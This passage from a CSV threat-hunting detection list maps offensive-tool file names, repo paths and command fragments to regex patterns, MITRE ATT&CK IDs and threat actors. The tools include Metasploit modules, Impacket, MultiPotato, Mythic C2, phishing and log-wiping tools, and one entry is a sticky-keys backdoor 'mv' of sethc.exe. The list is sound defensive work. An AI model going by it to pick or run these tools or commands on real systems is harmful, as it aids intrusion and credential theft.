Escalation","https://github.com/S3cur3Th1sSh1t/MultiPotato","1","0","N/A","10","5","497","89","2021-11-20T16:20:23Z","2021-11-19T15:50:55Z" "*mssgbox_shellcode_arranged_x64.b64*",".{0,1000}mssgbox_shellcode_arranged_x64\.b64.{0,1000}","offensive_tool_keyword","Executable_Files","Database for custom made as well as publicly available stage-2 or beacons or stageless payloads used by loaders/stage-1/stagers or for further usage of C2 as well","T1071 - T1071.001 - T1105 - T1041 - T1102","TA0011 - TA0005 - TA0010","N/A","N/A","Exploitation tools","https://github.com/reveng007/Executable_Files","1","1","N/A","10","1","8","2","2024-04-29T01:58:07Z","2021-12-10T15:04:35Z" "*mssgbox_shellcode_exitfunc_thread_x64.bin*",".{0,1000}mssgbox_shellcode_exitfunc_thread_x64\.bin.{0,1000}","offensive_tool_keyword","Executable_Files","Database for custom made as well as publicly available stage-2 or beacons or stageless payloads used by loaders/stage-1/stagers or for further usage of C2 as well","T1071 - T1071.001 - T1105 - T1041 - T1102","TA0011 - TA0005 - TA0010","N/A","N/A","Exploitation tools","https://github.com/reveng007/Executable_Files","1","1","N/A","10","1","8","2","2024-04-29T01:58:07Z","2021-12-10T15:04:35Z" "*mssgbox_shellcode_x64.b64*",".{0,1000}mssgbox_shellcode_x64\.b64.{0,1000}","offensive_tool_keyword","Executable_Files","Database for custom made as well as publicly available stage-2 or beacons or stageless payloads used by loaders/stage-1/stagers or for further usage of C2 as well","T1071 - T1071.001 - T1105 - T1041 - T1102","TA0011 - TA0005 - TA0010","N/A","N/A","Exploitation tools","https://github.com/reveng007/Executable_Files","1","1","N/A","10","1","8","2","2024-04-29T01:58:07Z","2021-12-10T15:04:35Z" "*mssgbox_shellcode_x64.bin*",".{0,1000}mssgbox_shellcode_x64\.bin.{0,1000}","offensive_tool_keyword","Executable_Files","Database for custom made as well as publicly available stage-2 or beacons or stageless payloads used by loaders/stage-1/stagers or for further usage of C2 as well","T1071 - T1071.001 - T1105 - T1041 - T1102","TA0011 - TA0005 - TA0010","N/A","N/A","Exploitation tools","https://github.com/reveng007/Executable_Files","1","1","N/A","10","1","8","2","2024-04-29T01:58:07Z","2021-12-10T15:04:35Z" "*mssgbox_shellcode_x64.bin*",".{0,1000}mssgbox_shellcode_x64\.bin.{0,1000}","offensive_tool_keyword","Executable_Files","Database for custom made as well as publicly available stage-2 or beacons or stageless payloads used by loaders/stage-1/stagers or for further usage of C2 as well","T1071 - T1071.001 - T1105 - T1041 - T1102","TA0011 - TA0005 - TA0010","N/A","N/A","Exploitation tools","https://github.com/reveng007/Executable_Files","1","1","N/A","10","1","8","2","2024-04-29T01:58:07Z","2021-12-10T15:04:35Z" "*mssgbox_shellcode_x64_with_hexsymbol.txt*",".{0,1000}mssgbox_shellcode_x64_with_hexsymbol\.txt.{0,1000}","offensive_tool_keyword","Executable_Files","Database for custom made as well as publicly available stage-2 or beacons or stageless payloads used by loaders/stage-1/stagers or for further usage of C2 as well","T1071 - T1071.001 - T1105 - T1041 - T1102","TA0011 - TA0005 - TA0010","N/A","N/A","Exploitation tools","https://github.com/reveng007/Executable_Files","1","1","N/A","10","1","8","2","2024-04-29T01:58:07Z","2021-12-10T15:04:35Z" "*mssgbox_shellcode_x64_without_hexsymbol.txt*",".{0,1000}mssgbox_shellcode_x64_without_hexsymbol\.txt.{0,1000}","offensive_tool_keyword","Executable_Files","Database for custom made as well as publicly available stage-2 or beacons or stageless payloads used by loaders/stage-1/stagers or for further usage of C2 as well","T1071 - T1071.001 - T1105 - T1041 - T1102","TA0011 - TA0005 - TA0010","N/A","N/A","Exploitation tools","https://github.com/reveng007/Executable_Files","1","1","N/A","10","1","8","2","2024-04-29T01:58:07Z","2021-12-10T15:04:35Z" "*mssql_brute.rc*",".{0,1000}mssql_brute\.rc.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*mssql_local_auth_bypass.*",".{0,1000}mssql_local_auth_bypass\..{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*mssql_local_hashdump.rb*",".{0,1000}mssql_local_hashdump\.rb.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*mssqlattack.py*",".{0,1000}mssqlattack\.py.{0,1000}","offensive_tool_keyword","cobaltstrike","Beacon Object File (BOF) to obtain a usable TGT for the current user and does not require elevated privileges on the host","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/connormcgarr/tgtdelegation","1","1","N/A","10","10","140","21","2021-11-26T16:45:05Z","2021-11-22T18:42:57Z" "*mssqlattack.py*",".{0,1000}mssqlattack\.py.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral Movement","https://github.com/fortra/impacket","1","1","N/A","10","10","12711","3445","2024-04-29T12:46:57Z","2015-04-15T14:04:07Z" "*mssqlproxy-master*",".{0,1000}mssqlproxy\-master.{0,1000}","offensive_tool_keyword","mssqlproxy","mssqlproxy is a toolkit aimed to perform Lateral Movement in restricted environments through a compromised Microsoft SQL Server via socket reuse","T1021.002 - T1071.001 - T1573.002","TA0008 - TA0011","N/A","N/A","Lateral Movement - Sniffing & Spoofing","https://github.com/blackarrowsec/mssqlproxy","1","1","N/A","10","8","704","113","2021-02-16T20:13:04Z","2020-02-12T08:44:28Z" "*mssqlrelayclient.*",".{0,1000}mssqlrelayclient\..{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral Movement","https://github.com/fortra/impacket","1","1","N/A","10","10","12711","3445","2024-04-29T12:46:57Z","2015-04-15T14:04:07Z" "*mssqlrelayclient.py*",".{0,1000}mssqlrelayclient\.py.{0,1000}","offensive_tool_keyword","cobaltstrike","Beacon Object File (BOF) to obtain a usable TGT for the current user and does not require elevated privileges on the host","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/connormcgarr/tgtdelegation","1","1","N/A","10","10","140","21","2021-11-26T16:45:05Z","2021-11-22T18:42:57Z" "*mssqlsvc.kirbi*",".{0,1000}mssqlsvc\.kirbi.{0,1000}","offensive_tool_keyword","AD exploitation cheat sheet","Crack with TGSRepCrack","T1110","TA0006","N/A","N/A","Credential Access","https://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-cheat-sheet-and-command-reference","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*mthbernardes*rsg*",".{0,1000}mthbernardes.{0,1000}rsg.{0,1000}","offensive_tool_keyword","rsg","A tool to generate various ways to do a reverse shell","T1071.001 - T1071.004 - T1071.005 - T1071.006 - T1071.007","TA0002 - TA0011 - TA0003","N/A","N/A","POST Exploitation tools","https://github.com/mthbernardes/rsg","1","1","N/A","N/A","6","551","127","2024-02-29T16:28:28Z","2017-12-12T02:57:07Z" "*mttaggart/OffensiveNotion*",".{0,1000}mttaggart\/OffensiveNotion.{0,1000}","offensive_tool_keyword","OffensiveNotion","Notion (yes the notetaking app) as a C2.","T1090 - T1090.002 - T1071 - T1071.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/mttaggart/OffensiveNotion","1","1","N/A","10","10","1049","114","2023-05-21T13:24:01Z","2022-01-18T16:39:54Z" "*mtth-bfft/adeleg*",".{0,1000}mtth\-bfft\/adeleg.{0,1000}","offensive_tool_keyword","adeleg","an Active Directory delegation management tool. It allows you to make a detailed inventory of delegations set up so far in a forest","T1595 - T1087.002 - T1069.002","TA0007 - TA0004","N/A","N/A","Discovery","https://github.com/mtth-bfft/adeleg","1","1","N/A","8","3","246","30","2023-06-07T15:08:53Z","2022-02-09T19:47:04Z" "*mufeedvh/moonwalk*",".{0,1000}mufeedvh\/moonwalk.{0,1000}","offensive_tool_keyword","moonwalk","Cover your tracks during Linux Exploitation by leaving zero traces on system logs and filesystem timestamps.","T1070 - T1036.005 - T1070.004","TA0005 - TA0009","N/A","N/A","Defense Evasion","https://github.com/mufeedvh/moonwalk","1","1","N/A","10","10","1302","125","2022-10-08T05:05:36Z","2021-12-19T11:24:00Z" "*multi_meter_inject.rb*",".{0,1000}multi_meter_inject\.rb.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*multi_vendor_cctv_dvr_pass*",".{0,1000}multi_vendor_cctv_dvr_pass.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*multibit2john.py*",".{0,1000}multibit2john\.py.{0,1000}","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","9291","1993","2024-04-30T12:58:37Z","2011-12-16T19:43:47Z" "*MultiPotato.cpp*",".{0,1000}MultiPotato\.cpp.{0,1000}","offensive_tool_keyword","MultiPotato","get SYSTEM via SeImpersonate privileges","T1548.002 - T1134.002","TA0004 - TA0006","N/A","N/A","Privilege Escalation","https://github.com/S3cur3Th1sSh1t/MultiPotato","1","1","N/A","10","5","497","89","2021-11-20T16:20:23Z","2021-11-19T15:50:55Z" "*MultiPotato.exe*",".{0,1000}MultiPotato\.exe.{0,1000}","offensive_tool_keyword","MultiPotato","get SYSTEM via SeImpersonate privileges","T1548.002 - T1134.002","TA0004 - TA0006","N/A","N/A","Privilege Escalation","https://github.com/S3cur3Th1sSh1t/MultiPotato","1","1","N/A","10","5","497","89","2021-11-20T16:20:23Z","2021-11-19T15:50:55Z" "*MultiPotato-main*",".{0,1000}MultiPotato\-main.{0,1000}","offensive_tool_keyword","MultiPotato","get SYSTEM via SeImpersonate privileges","T1548.002 - T1134.002","TA0004 - TA0006","N/A","N/A","Privilege Escalation","https://github.com/S3cur3Th1sSh1t/MultiPotato","1","1","N/A","10","5","497","89","2021-11-20T16:20:23Z","2021-11-19T15:50:55Z" "*--mutator N*",".{0,1000}\-\-mutator\sN.{0,1000}","offensive_tool_keyword","litefuzz","A multi-platform fuzzer for poking at userland binaries and servers","T1587.004","TA0009","N/A","N/A","Exploitation tools","https://github.com/sec-tools/litefuzz","1","0","N/A","7","1","63","11","2023-07-16T00:15:41Z","2021-09-17T14:40:07Z" "*mutator.py *",".{0,1000}mutator\.py\s.{0,1000}","offensive_tool_keyword","litefuzz","A multi-platform fuzzer for poking at userland binaries and servers","T1587.004","TA0009","N/A","N/A","Exploitation tools","https://github.com/sec-tools/litefuzz","1","0","N/A","7","1","63","11","2023-07-16T00:15:41Z","2021-09-17T14:40:07Z" "*mv ""/media/windows/Windows/System32/sethc.exe"" ""/media/windows/Windows/System32/*",".{0,1000}mv\s\""\/media\/windows\/Windows\/System32\/sethc\.exe\""\s\""\/media\/windows\/Windows\/System32\/.{0,1000}","offensive_tool_keyword","WinPirate","automated sticky keys backdoor + credentials harvesting","T1547.001 - T1546.008 - T1555.003 - T1059 - T1573 - T1070.004 - T1003","TA0003 - TA0005 - TA0006","N/A","N/A","Persistence","https://github.com/l3m0n/WinPirate","1","0","N/A","9","1","12","32","2016-07-17T20:02:07Z","2016-07-18T03:40:13Z" "*mv *.ccache *.ccache*",".{0,1000}mv\s.{0,1000}\.ccache\s.{0,1000}\.ccache.{0,1000}","offensive_tool_keyword","LDAP-Password-Hunter","LDAP Password Hunter is a tool which wraps features of getTGT.py (Impacket) and ldapsearch in order to look up for password stored in LDAP database","T1558.003 - T1003.003 - T1078.003 - T1212","TA0006 - TA0007 - TA0003","N/A","N/A","Credential Access","https://github.com/oldboy21/LDAP-Password-Hunter","1","0","N/A","10","2","191","27","2023-01-06T15:32:34Z","2021-07-26T14:27:01Z" "*mvelazc0/BadZure*",".{0,1000}mvelazc0\/BadZure.{0,1000}","offensive_tool_keyword","badazure","BadZure orchestrates the setup of Azure Active Directory tenants populating them with diverse entities while also introducing common security misconfigurations to create vulnerable tenants with multiple attack paths","T1583 - T1078.004 - T1095","TA0005 - TA0006 - TA0008","N/A","N/A","Exploitation Tools","https://github.com/mvelazc0/BadZure/","1","1","N/A","5","4","350","20","2023-12-04T16:14:07Z","2023-05-05T04:52:21Z" "*mwrlabs*",".{0,1000}mwrlabs.{0,1000}","offensive_tool_keyword","Github Username","used to be a malware repo aso hosting exploitation tools","N/A","N/A","N/A","N/A","Exploitation tools","https://github.com/mwrlabs","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*-my.sharepoint.com/personal/Fakeuser*",".{0,1000}\-my\.sharepoint\.com\/personal\/Fakeuser.{0,1000}","offensive_tool_keyword","onedrive_user_enum","enumerate valid onedrive users","T1087 - T1110","TA0006","N/A","N/A","Network Exploitation tools","https://github.com/nyxgeek/onedrive_user_enum","1","1","N/A","N/A","6","553","72","2024-04-05T17:19:50Z","2019-03-05T08:54:38Z" "*-my.sharepoint.com/personal/TESTUSER_*",".{0,1000}\-my\.sharepoint\.com\/personal\/TESTUSER_.{0,1000}","offensive_tool_keyword","onedrive_user_enum","enumerate valid onedrive users","T1087 - T1110","TA0006","N/A","N/A","Network Exploitation tools","https://github.com/nyxgeek/onedrive_user_enum","1","1","N/A","N/A","6","553","72","2024-04-05T17:19:50Z","2019-03-05T08:54:38Z" "*my_dump_my_pe*",".{0,1000}my_dump_my_pe.{0,1000}","offensive_tool_keyword","cobaltstrike","A proof-of-concept Cobalt Strike Reflective Loader which aims to recreate. integrate. and enhance Cobalt Strike's evasion features!","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/boku7/BokuLoader","1","1","N/A","10","10","1186","235","2023-11-22T22:25:50Z","2021-08-15T18:17:28Z" "*MY_MESSAGE ""I did it for the vine.""*",".{0,1000}MY_MESSAGE\s\""I\sdid\sit\sfor\sthe\svine\.\"".{0,1000}","offensive_tool_keyword","Thread-Pool-Injection-PoC","Proof of concept code for thread pool based process injection in Windows.","T1055.011","TA0005","N/A","N/A","Defense Evasion","https://github.com/Uri3n/Thread-Pool-Injection-PoC","1","0","N/A","8","1","70","9","2024-02-11T18:45:31Z","2024-01-24T07:42:08Z" "*MyMeterpreter.ps1*",".{0,1000}MyMeterpreter\.ps1.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/r00t-3xp10it/redpill","1","1","N/A","10","3","210","53","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z" "*myreallycooltotallyrealtenant.onmicrosoft.com*",".{0,1000}myreallycooltotallyrealtenant\.onmicrosoft\.com.{0,1000}","offensive_tool_keyword","teamsphisher","Send phishing messages and attachments to Microsoft Teams users","T1566.001 - T1566.002 - T1204.001","TA0001 - TA0005","N/A","N/A","phishing","https://github.com/Octoberfest7/TeamsPhisher","1","1","N/A","N/A","10","969","127","2024-04-23T14:52:03Z","2023-07-03T02:19:47Z" "*myseatbelt.py*",".{0,1000}myseatbelt\.py.{0,1000}","offensive_tool_keyword","donpapi","Dumping DPAPI credentials remotely","T1003.006 - T1021.001","TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/login-securite/DonPAPI","1","1","N/A","N/A","9","811","100","2024-04-18T05:54:07Z","2021-09-27T09:12:51Z" "*mysql -u* -p c2 < c2_sample.sql*",".{0,1000}mysql\s\-u.{0,1000}\s\-p\sc2\s\<\sc2_sample\.sql.{0,1000}","offensive_tool_keyword","golang_c2","C2 written in Go for red teams aka gorfice2k","T1071 - T1021 - T1090","TA0011 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/m00zh33/golang_c2","1","0","N/A","10","10","6","8","2019-03-18T00:46:41Z","2019-03-19T02:39:59Z" "*mysql_authbypass_hashdump.rb*",".{0,1000}mysql_authbypass_hashdump\.rb.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*mysql_file_enum.rb*",".{0,1000}mysql_file_enum\.rb.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*mysql_hashdump.rb*",".{0,1000}mysql_hashdump\.rb.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*mysql-privesc-race.c*",".{0,1000}mysql\-privesc\-race\.c.{0,1000}","offensive_tool_keyword","linux-exploit-suggester","Linux privilege escalation auditing tool","T1078 - T1068 - T1055","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/The-Z-Labs/linux-exploit-suggester","1","1","N/A","10","10","5246","1068","2024-02-17T11:44:50Z","2016-10-06T21:55:51Z" "*Mystikal-main*",".{0,1000}Mystikal\-main.{0,1000}","offensive_tool_keyword","Mystikal","macOS Initial Access Payload Generator","T1059.005 - T1204.002 - T1566.001","TA0002 - TA0001","N/A","N/A","Exploitation tools","https://github.com/D00MFist/Mystikal","1","1","N/A","9","3","268","38","2024-01-10T15:48:12Z","2021-05-03T14:46:16Z" "*mythic_c2_container*",".{0,1000}mythic_c2_container.{0,1000}","offensive_tool_keyword","mythic","A collaborative multi-platform red teaming framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003","N/A","N/A","C2","https://github.com/its-a-feature/Mythic","1","1","N/A","10","10","2895","405","2024-04-23T14:28:51Z","2018-07-05T02:09:59Z" "*mythic_nginx*",".{0,1000}mythic_nginx.{0,1000}","offensive_tool_keyword","mythic","A collaborative multi-platform red teaming framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003","N/A","N/A","C2","https://github.com/its-a-feature/Mythic","1","1","N/A","10","10","2895","405","2024-04-23T14:28:51Z","2018-07-05T02:09:59Z" "*mythic_payloadtype*",".{0,1000}mythic_payloadtype.{0,1000}","offensive_tool_keyword","mythic","A collaborative multi-platform red teaming framework","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1105 - T1106 - T1107 - T1112 - T1204","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/its-a-feature/Mythic","1","1","N/A","10","10","2895","405","2024-04-23T14:28:51Z","2018-07-05T02:09:59Z" "*mythic_payloadtype*",".{0,1000}mythic_payloadtype.{0,1000}","offensive_tool_keyword","mythic","A collaborative multi-platform red teaming framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003","N/A","N/A","C2","https://github.com/its-a-feature/Mythic","1","1","N/A","10","10","2895","405","2024-04-23T14:28:51Z","2018-07-05T02:09:59Z" "*mythic_payloadtype_container*",".{0,1000}mythic_payloadtype_container.{0,1000}","offensive_tool_keyword","mythic","A collaborative multi-platform red teaming framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - 